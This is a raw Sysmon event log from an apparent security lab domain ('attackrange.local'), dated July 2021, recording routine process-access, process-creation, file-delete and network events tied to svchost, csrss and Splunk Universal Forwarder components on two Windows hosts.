07:53:24.975{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807744Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.975{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807743Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.975{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807742Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.975{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807741Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.975{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807740Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.959{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807739Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.959{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807738Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.959{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807737Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.959{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F4F4-60EB-7B79-00000000D001}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807736Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.959{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4F4-60EB-7B79-00000000D001}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807735Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.960{0C1E0330-F4F4-60EB-7B79-00000000D001}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000807734Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.287{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4F4-60EB-7A79-00000000D001}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807733Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.287{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807732Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.287{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807731Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.287{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807730Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.287{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807729Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.287{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807728Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.287{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807727Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.287{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807726Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.272{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807725Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.272{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F4F4-60EB-7A79-00000000D001}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807724Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.272{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807723Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.272{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4F4-60EB-7A79-00000000D001}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807722Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.272{0C1E0330-F4F4-60EB-7A79-00000000D001}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807721Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.272{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72757DB1BEF7482DACF54696CEEDF2E9,SHA256=D5ACEA59E8D0A3E1526FFAD680D97628062DB90607BBDCBDB51CD7926E2FD487,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049293Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:25.728{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06A4A2F61ACA1CE688676140AFD6F241,SHA256=1FA868011343B22872EDA6BEF32F019CBEE52D9A9811C05292A1F74194E1C9D8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807765Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.709{0C1E0330-F4F5-60EB-7C79-00000000D001}35203420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000807764Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.326{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57280-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 